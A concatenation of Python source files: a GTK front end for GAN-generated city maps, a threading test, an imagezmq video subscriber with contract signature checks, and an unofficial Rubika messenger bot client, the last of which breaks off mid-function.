self.pix2pix_generate_button = Gtk.Button(label="Make a Map") self.pix2pix_generate_button.connect("clicked", self.pix2pix_generate_clicked) # Packing self.gan_options_box.pack_start(self.gan_generate_button, False, True, 10) self.gan_options_box.pack_end(self.gan_save_button, False, True, 10) self.pix2pix_options_box.pack_start(self.load_button, False, True, 10) self.pix2pix_options_box.pack_start(self.pix2pix_generate_button, False, True, 10) self.pix2pix_options_box.pack_end(self.pix2pix_save_button, False, True, 10) self.image_box.pack_end(self.appstatus, False, False, 0) self.add(self.horiz_box) self.show_all() self.set_status("Started successfully") # Resizing Functions def on_check_resize(self, window): allocation = self.image_area.get_allocation() self.image_area.set_allocation(allocation) self.q.put(self.resizeImage(allocation.width, allocation.height)) def resizeImage(self, x, y): self.scale_pixbuf = self.pixbuf.scale_simple(x, y, GdkPixbuf.InterpType.BILINEAR) self.image_area.set_from_pixbuf(None) self.image_area.queue_draw() def on_draw(self, win, cr): Gdk.cairo_set_source_pixbuf(cr, self.scale_pixbuf, 5, 5) cr.paint() def gan_generate_clicked(self, widget): try: start = process_time() self.q.put(self.get_map()) finish = process_time() self.set_status("Map Generated", finish - start) except: self.set_status("Map Generation Failed") def get_map(self): self.map_data = self.generator.generate_map() self.map_array = self.map_data.astype(np.uint8) self.pixbuf = GdkPixbuf.Pixbuf.new_from_data(self.map_array.tobytes(), GdkPixbuf.Colorspace.RGB, False, 8, self.map_data.shape[1], self.map_data.shape[0], self.map_data.shape[1] * 3) self.gan_save_button.set_sensitive(True) self.pix2pix_generate_button.set_sensitive(False) self.pix2pix_save_button.set_sensitive(False) self.image_area.set_from_pixbuf(self.scale_pixbuf) def save_map_clicked(self, widget): try: self.q.put(self.save_map(widget)) except OSError: self.set_status("File save failed. Check your filename and try again.") except: self.set_status("File save failed! General Error.") raise def save_map(self, widget): save_dialog = Gtk.FileChooserDialog(title="Save Map", action=Gtk.FileChooserAction.SAVE) save_dialog.add_buttons(Gtk.STOCK_SAVE, Gtk.ResponseType.OK, Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL) save_dialog.connect("response", self.save_response) save_dialog.run() def save_response(self, dialog, response): current_page = self.options_book.get_current_page() if response == Gtk.ResponseType.OK: start = process_time() filename = dialog.get_filename() finish = process_time() if current_page == 0: # NEEDS TO BE UPDATED IF ADDITIONAL MODELS ARE ADDED self.generator.save_generated_map(self.map_data, filename) elif current_page == 1: self.pix2pix.saveImage(self.map_data, filename) else: self.set_status("Save cancelled") dialog.destroy() self.set_status(os.path.basename(filename) + " saved successfully") def on_load_clicked(self, widget): try: self.q.put(self.on_load(widget)) except OSError: self.set_status("Loading file failed! Check filename and try again.") except: self.set_status("Loading file failed!") def on_load(self, widget): png_filter = Gtk.FileFilter() png_filter.set_name("PNG File") png_filter.add_mime_type("image/png") load_dialog = Gtk.FileChooserDialog(title="Select a png", action=Gtk.FileChooserAction.OPEN) load_dialog.add_buttons(Gtk.STOCK_OPEN, Gtk.ResponseType.OK, Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL) load_dialog.add_filter(png_filter) load_dialog.connect("response", self.load_response) load_dialog.run() def load_response(self, dialog, response): if response == Gtk.ResponseType.OK: start = process_time() filename = dialog.get_filename() finish = process_time() self.pix2pix_generate_button.set_sensitive(True) self.pix2pix_save_button.set_sensitive(True) self.pix2pix.loadImage(filename) dialog.destroy() try: self.set_status(os.path.basename(filename) + " loaded") except: self.set_status("Loading cancelled") def pix2pix_generate_clicked(self, widget): try: start = process_time() self.q.put(self.pix2pix_generate(widget)) finish = process_time() self.set_status("Map generated", finish - start) except: self.set_status("Map generation failed") def pix2pix_generate(self, widget): self.map_data = self.pix2pix.genImage() self.map_array = citygan_util.mapRangeToRange(self.map_data, [0, 1], [0, 255]).astype(np.uint8) self.pixbuf = GdkPixbuf.Pixbuf.new_from_data(self.map_array.tobytes(), GdkPixbuf.Colorspace.RGB, False, 8, self.map_data.shape[1], self.map_data.shape[0], self.map_data.shape[1] * 3) self.scale_pixbuf = self.pixbuf self.pix2pix_save_button.set_sensitive(True) self.gan_save_button.set_sensitive(False) self.image_area.set_from_pixbuf(self.scale_pixbuf) def set_status(self, string, time=None): full_string = "Application Status: " + string if time is not None: full_string = full_string + " | Time taken: " + str(round(time, 3)) + " seconds" self.appstatus.set_label(full_string) def main(): application = GanCities() Gtk.main() if __name__ == "__main__": main() # Unused code: # Enable training if model supports it # self.train_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL) # self.train_label = Gtk.Label(label="Training Folder:") # self.train_folder_select = Gtk.FileChooserButton(title="Training Folder", action=Gtk.FileChooserAction.SELECT_FOLDER) # self.train_button = Gtk.Button(label="Start Training") # self.train_button.connect("clicked", self.train_clicked, self.generator, self.train_folder_select) # self.train_box.pack_start(self.train_label, False, True, 10) # self.train_box.pack_start(self.train_folder_select, False, False, 10) # self.train_box.pack_start(self.train_button,True, True, 10) # Combo-Box Selection # Country Style Combobox # self.country_model = Gtk.ListStore(str) # for country in self.countries: # self.country_model.append([country]) # self.country_style = Gtk.ComboBox(model=self.country_model) # country_cell = Gtk.CellRendererText() # self.country_style.pack_start(country_cell, False) # self.country_style.add_attribute(country_cell, "text", 0) # self.country_style.set_entry_text_column(0) # self.country_style.set_active(0) # Population Spinner # pop_adjustment = Gtk.Adjustment(value=1000, lower=1000, upper=10000000, step_increment=1000) # self.popspinner = Gtk.SpinButton(numeric=True) # self.popspinner.set_adjustment(pop_adjustment) # Output Dimensions # self.dim_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL) # self.dimlabel1 = Gtk.Label(label="Map Dimensions") # self.dimlabel2 = Gtk.Label(label="x") # dim_xadjustment = Gtk.Adjustment(value=400, lower=200, upper=3440, step_increment=10) # dim_yadjustment = Gtk.Adjustment(value=400, lower=200, upper=3440, step_increment=10) # self.xspinner = Gtk.SpinButton(numeric=True, adjustment=dim_xadjustment) # self.yspinner = Gtk.SpinButton(numeric=True, adjustment=dim_yadjustment) # self.dim_box.pack_start(self.dimlabel1, True, True, 0) # self.dim_box.pack_start(self.xspinner, True, True, 0) # self.dim_box.pack_start(self.dimlabel2, True, True, 0) # self.dim_box.pack_start(self.yspinner, True, True, 0)
test_two_threads_resume.py
from threading import Thread, RLock from time import sleep lock = RLock() def foo(): sleep(1) while True: lock.acquire() x = 12 sleep(0.01) lock.release() print("finished foo()", x) threads = [Thread(target=foo, name="Thread1"), Thread(target=foo, name="Thread2")] for thread in threads: thread.start()
videoStramSubscriber2.py
import sys import socket import traceback import cv2 from imutils.video import VideoStream import imagezmq import threading import numpy as np #from time import sleep import time import cv2 from nacl.signing import VerifyKey class VideoStreamSubscriber: def __init__(self, hostname, port, merkle_tree_interval, contractHash, minimum_receive_rate_from_contractor, vk, input_size): self.hostname = hostname self.port = port self._stop = False self._data = '' self._data2 = '' self._data_ready = threading.Event() self._data2_ready = threading.Event() self._thread = threading.Thread(target=self._run, args=()) self._thread2 = threading.Thread(target=self._run2, args=(merkle_tree_interval, contractHash, minimum_receive_rate_from_contractor, vk, input_size)) self._thread.daemon = True self._thread2.daemon = True self._thread.start() self._thread2.start() def receive(self, timeout=15.0): #a = 0 #waited = False #if not self._data_ready.is_set() : #a = time.perf_counter() #waited = True flag = self._data_ready.wait(timeout=timeout) if not flag: raise TimeoutError( "Contract aborted: Outsourcer at tcp://{}:{}".format(self.hostname, self.port) + 'timed out. Possible Consquences for Outsourcer: Blacklist, Bad Review') #if waited : #print('Waited', (time.perf_counter() - a)*1000) self._data_ready.clear() return self._data def _run(self): receiver = imagezmq.ImageHub("tcp://{}:{}".format(self.hostname, self.port), REQ_REP=False) print('here6') #countera = 0 #counterb = 0 while not self._stop: #name, compressed = receiver.recv_jpg() #decompressed = cv2.imdecode( #np.frombuffer(compressed, dtype='uint8'), -1) #self._data = name, compressed, decompressed #countera += 1 #print(countera) #f = time.perf_counter() #time.sleep(0.05) #counterb += 1 #print(counterb, time.perf_counter() - f) #self._data_ready.set() self._data = receiver.recv_jpg() self._data_ready.set() receiver.close() def _run2(self, merkle_tree_interval, contractHash, minimum_receive_rate_from_contractor, vk, input_size): while not self._stop: name, compressed = self.receive() decompressedImage = cv2.imdecode( np.frombuffer(compressed, dtype='uint8'), -1) #self._data2 = name, compressed, decompressed if name == 'abort': sys.exit('Contract aborted by outsourcer according to custom') if merkle_tree_interval == 0: try: vk.verify(bytes(compressed) + contractHash + bytes(name[-2]) + bytes(name[-1]), bytes(name[:-2])) except: sys.exit( 'Contract aborted: Outsourcer signature does not match input. Possible Consquences for Outsourcer: Blacklist, Bad Review') # print(vrification_result) # if name[-1] < (image_count-2)*minimum_receive_rate_from_contractor: # sys.exit( # 'Contract aborted: Outsourcer did not acknowledge enough ouputs. Possible Consquences for Outsourcer: Blacklist, Bad Review') else: # verify if signature matches image, contract hash, and image count, and number of intervals, and random number try: vk.verify(bytes(compressed) + contractHash + bytes(name[-5]) + bytes(name[-4]) + bytes(name[-3]) + bytes(name[-2]) + bytes(name[-1]), bytes(name[:-5])) except: sys.exit( 'Contract aborted: Outsourcer signature does not match input. Possible Consquences for Outsourcer: Blacklist, Bad Review') # if name[-4] < (image_count-2)*minimum_receive_rate_from_contractor: # sys.exit( # 'Contract aborted: Outsourcer did not acknowledge enough ouputs. Possible Consquences for Outsourcer: Blacklist, Bad Review') # image preprocessing # region original_image = cv2.cvtColor(decompressedImage, cv2.COLOR_BGR2RGB) image_data = cv2.resize( original_image, (input_size, input_size)) # 0.4ms image_data = image_data / 255. # 2.53ms images_data = [] for i in range(1): images_data.append(image_data) images_data = np.asarray(images_data).astype(np.float32) # 3.15ms self._data2 = (images_data, name, original_image) self._data2_ready.set() def receive2(self, timeout=15.0): flag = self._data2_ready.wait(timeout=timeout) if not flag: raise TimeoutError( "Contract aborted11: Outsourcer at tcp://{}:{}".format(self.hostname, self.port) + 'timed out. Possible Consquences for Outsourcer: Blacklist, Bad Review') #if waited : #print('Waited', (time.perf_counter() - a)*1000) self._data2_ready.clear() return self._data2 def close(self): self._stop = True # Simulating heavy processing load def limit_to_2_fps(): sleep(0.5)
bot.py
import asyncio import base64 import concurrent.futures import datetime import glob import json import math import os import pathlib import random import sys import time from json import dumps, loads from random import randint import re from re import findall import requests import urllib3 from Crypto.Cipher import AES from Crypto.Util.Padding import pad, unpad from requests import post from googletrans import Translator from bidi.algorithm import get_display from mutagen.mp3 import MP3 from gtts import gTTS from threading import Thread urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) from difflib import SequenceMatcher def similar(a, b): return SequenceMatcher(None, a, b).ratio() #lisence by bahman ahmadi this classes #this classes opened sourse and free class encryption: def __init__(self, auth): self.key = bytearray(self.secret(auth), "UTF-8") self.iv = bytearray.fromhex('00000000000000000000000000000000') def replaceCharAt(self, e, t, i): return e[0:t] + i + e[t + len(i):] def secret(self, e): t = e[0:8] i = e[8:16] n = e[16:24] + t + e[24:32] + i s = 0 while s < len(n): e = n[s] if e >= '0' and e <= '9': t = chr((ord(e[0]) - ord('0') + 5) % 10 + ord('0')) n = self.replaceCharAt(n, s, t) else: t = chr((ord(e[0]) - ord('a') + 9) % 26 + ord('a')) n = self.replaceCharAt(n, s, t) s += 1 return n def encrypt(self, text): raw = pad(text.encode('UTF-8'), AES.block_size) aes = AES.new(self.key, AES.MODE_CBC, self.iv) enc = aes.encrypt(raw) result = base64.b64encode(enc).decode('UTF-8') return result def decrypt(self, text): aes = AES.new(self.key, AES.MODE_CBC, self.iv) dec = aes.decrypt(base64.urlsafe_b64decode(text.encode('UTF-8'))) result = unpad(dec, AES.block_size).decode('UTF-8') return result class Bot: def __init__(self, auth): self.auth = auth self.enc = encryption(auth) def sendMessage(self, chat_id, text, message_id=None): if message_id == None: t = False while t == False: try: p = post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "text":text, "reply_to_message_id":message_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/") p = loads(self.enc.decrypt(p.json()["data_enc"])) t = True except: t = False return p else: t = False while t == False: try: p = post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "text":text, "reply_to_message_id":message_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/") p = loads(self.enc.decrypt(p.json()["data_enc"])) t = True except: t = False return p def deleteMessages(self, chat_id, message_ids): return post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"deleteMessages", "input":{ "object_guid":chat_id, "message_ids":message_ids, "type":"Global" }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c66.iranlms.ir/") def requestFile(self, name, size , mime): o = '' while str(o) != '<Response [200]>': o = post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"requestSendFile", "input":{ "file_name":name, "size":size, "mime":mime }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c66.iranlms.ir/") try: k = loads(self.enc.decrypt(o.json()["data_enc"])) if k['status'] != 'OK' or k['status_det'] != 'OK': o = '502' except: o = '502' return k['data'] def fileUpload(self, bytef ,hash_send ,file_id ,url): if len(bytef) <= 131072: h = { 'auth':self.auth, 'chunk-size':str(len(bytef)), 'file-id':str(file_id), 'access-hash-send':hash_send, 'total-part':str(1), 'part-number':str(1) } t = False while t == False: try: j = post(data=bytef,url=url,headers=h).text j = loads(j)['data']['access_hash_rec'] t = True except: t = False return j else: t = len(bytef) / 131072 t += 1 t = random._floor(t) for i in range(1,t+1): if i != t: k = i - 1 k = k * 131072 t2 = False while t2 == False: try: o = post(data=bytef[k:k + 131072],url=url,headers={ 'auth':self.auth, 'chunk-size':str(131072), 'file-id':file_id, 'access-hash-send':hash_send, 'total-part':str(t), 'part-number':str(i) }).text o = loads(o)['data'] t2 = True except: t2 = False j = k + 131072 j = round(j / 1024) j2 = round(len(bytef) / 1024) print(str(j) + 'kb / ' + str(j2) + ' kb') else: k = i - 1 k = k * 131072 t2 = False while t2 == False: try: p = post(data=bytef[k:],url=url,headers={ 'auth':self.auth, 'chunk-size':str(len(bytef[k:])), 'file-id':file_id, 'access-hash-send':hash_send, 'total-part':str(t), 'part-number':str(i) }).text p = loads(p)['data']['access_hash_rec'] t2 = True except: t2 = False j2 = round(len(bytef) / 1024) print(str(j2) + 'kb / ' + str(j2) + ' kb') return p def sendFile(self, chat_id, file_id , mime , dc_id, access_hash_rec, file_name, size, text=None, message_id=None): if text == None: if message_id == None: t = False while t == False: try: p = loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"File", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) t = True except: t = False return p else: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "reply_to_message_id":message_id, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"File", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) else: if message_id == None: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "text":text, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"File", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) else: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "text":text, "reply_to_message_id":message_id, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"File", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) def sendImage(self, chat_id, file_id , mime , dc_id, access_hash_rec, file_name, size, thumb_inline , width , height, text=None, message_id=None): if text == None: if message_id == None: t = False while t == False: try: p = loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"Image", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec, 'thumb_inline':thumb_inline, 'width':width, 'height':height } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) t = True except: t = False return p else: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "reply_to_message_id":message_id, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"Image", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec, 'thumb_inline':thumb_inline, 'width':width, 'height':height } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) else: if message_id == None: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "text":text, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"Image", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec, 'thumb_inline':thumb_inline, 'width':width, 'height':height } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) else: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "text":text, "reply_to_message_id":message_id, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"Image", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec, 'thumb_inline':thumb_inline, 'width':width, 'height':height } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) def sendVoice(self, chat_id, file_id , mime , dc_id, access_hash_rec, file_name, size, duration, text=None, message_id=None): if text == None: if message_id == None: t = False while t == False: try: p = loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"Voice", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec, 'time':duration, } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) t = True except: t = False return p else: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "reply_to_message_id":message_id, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"Voice", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec, 'time':duration, } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) else: if message_id == None: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "text":text, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"Voice", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec, 'time':duration, } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) else: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "text":text, "reply_to_message_id":message_id, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"Voice", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec, 'time':duration, } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) def getUserInfo(self, chat_id): return loads(self.enc.decrypt(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getUserInfo", "input":{ "user_guid":chat_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c37.iranlms.ir/").json()["data_enc"])) def getMessages(self, chat_id,min_id): return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getMessagesInterval", "input":{ "object_guid":chat_id, "middle_message_id":min_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c67.iranlms.ir/").json().get("data_enc"))).get("data").get("messages") def getInfoByUsername(self, username): ''' username should be without @ ''' return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getObjectByUsername", "input":{ "username":username }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c23.iranlms.ir/").json().get("data_enc"))) def banGroupMember(self, chat_id, user_id): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"banGroupMember", "input":{ "group_guid": chat_id, "member_guid": user_id, "action":"Set" }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c21.iranlms.ir/") def invite(self, chat_id, user_ids): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"addGroupMembers", "input":{ "group_guid": chat_id, "member_guids": user_ids }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c22.iranlms.ir/") def getGroupAdmins(self, chat_id): t = False while t == False: try: p = post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "client":{ "app_name":"Main", "app_version":"2.9.5", "lang_code":"fa", "package":"ir.resaneh1.iptv", "platform":"Android" }, "input":{ "group_guid":chat_id }, "method":"getGroupAdminMembers" }))},url="https://messengerg2c22.iranlms.ir/") p = loads(self.enc.decrypt(p.json().get("data_enc"))) t = True except: t = False return p def getMessagesInfo(self, chat_id, message_ids): return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getMessagesByID", "input":{ "object_guid": chat_id, "message_ids": message_ids }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))}, url="https://messengerg2c24.iranlms.ir/").json()["data_enc"])).get("data").get("messages") def setMembersAccess(self, chat_id, access_list): return post(json={ "api_version": "4", "auth": self.auth, "client": { "app_name": "Main", "app_version": "2.9.5", "lang_code": "fa", "package": "ir.resaneh1.iptv", "platform": "Android" }, "data_enc": self.enc.encrypt(dumps({ "access_list": access_list, "group_guid": chat_id })), "method": "setGroupDefaultAccess" }, url="https://messengerg2c24.iranlms.ir/") def getGroupInfo(self, chat_id): return loads(self.enc.decrypt(post( json={ "api_version":"5", "auth": self.auth, "data_enc": self.enc.encrypt(dumps({ "method":"getGroupInfo", "input":{ "group_guid": chat_id, }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))}, url="https://messengerg2c24.iranlms.ir/").json()["data_enc"])) def get_updates_all_chats(self): t = False while t == False: try: time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200) p = post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getChatsUpdates", "input":{ "state":time_stamp, }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c67.iranlms.ir/") p = loads(self.enc.decrypt(p.json().get("data_enc"))).get("data").get("chats") t = True except: t = False return p def get_updates_chat(self, chat_id): time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200) return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getMessagesUpdates", "input":{ "object_guid":chat_id, "state":time_stamp }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c67.iranlms.ir/").json().get("data_enc"))).get("data").get("updated_messages") def my_sticker_set(self): time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200) return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getMyStickerSets", "input":{}, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c67.iranlms.ir/").json().get("data_enc"))).get("data") def getThumbInline(self,image_bytes:bytes): im = Image.open(io.BytesIO(image_bytes)) width, height = im.size if height > width: new_height = 40 new_width = round(new_height * width / height) else: new_width = 40 new_height = round(new_width * height / width) im = im.resize((new_width, new_height), Image.ANTIALIAS) changed_image = io.BytesIO() im.save(changed_image, format='PNG') changed_image = changed_image.getvalue() return base64.b64encode(changed_image) def getImageSize(self,image_bytes:bytes): im = Image.open(io.BytesIO(image_bytes)) width, height = im.size return width , height def hex_to_rgb(self,value): value = value.lstrip('#') lv = len(value) return tuple(int(value[i:i + lv // 3], 16) for i in range(0, lv, lv // 3)) def write_text_image(self,text:str,bc_color:str='yellow',size:int=40,color='#3d3d3d',x=50,y=100): try: file_name = 'image/'+ bc_color +'.jpg' image = Image.open(file_name) size = int(size) font = ImageFont.truetype('Vazir-Regular.ttf', size, encoding='unic') draw = ImageDraw.Draw(image) reshaped_text = arabic_reshaper.reshape(text) # correct its shape changed_image = io.BytesIO() if color.startswith('#') and len(color) < 8: color = self.hex_to_rgb(color) draw.text((x, y), reshaped_text,color, font = font) image.save(changed_image, format='PNG') changed_image = changed_image.getvalue() return changed_image elif color.startswith('(') and len(color) < 14 and color.count(',') == 2: color = color.replace('(', '').replace(')', '') list_c = color.split(',') list_c2 = [] for i in list_c: list_c2.append(int(i)) color = tuple(list_c2) draw.text((x, y), bidi_text,color, font = font) image.save(changed_image, format='PNG') changed_image = changed_image.getvalue() return changed_image else: return 'err' except: return 'err' def hasInsult(msg): swData = [False,None] for i in open("dontReadMe.txt").read().split("\n"): if i in msg: swData = [True, i] break else: continue return swData def hasAds(msg): links = list(map(lambda ID: ID.strip()[1:],findall("@[\w|_|\d]+", msg))) + list(map(lambda link:link.split("/")[-1],findall("rubika\.ir/\w+",msg))) joincORjoing = "joing" in msg or "joinc" in msg if joincORjoing: return joincORjoing else: for link in links: try: Type = bot.getInfoByUsername(link)["data"]["chat"]["abs_object"]["type"] if Type == "Channel": return True except KeyError: return False def search_i(text,chat,bot): try: search = text[11:-1] if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group': bot.sendMessage(chat['object_guid'], 'نتایج کامل به زودی به پیوی شما ارسال میشوند', chat['last_message']['message_id']) jd = json.loads(requests.get('https://zarebin.ir/api/image/?q=' + search + 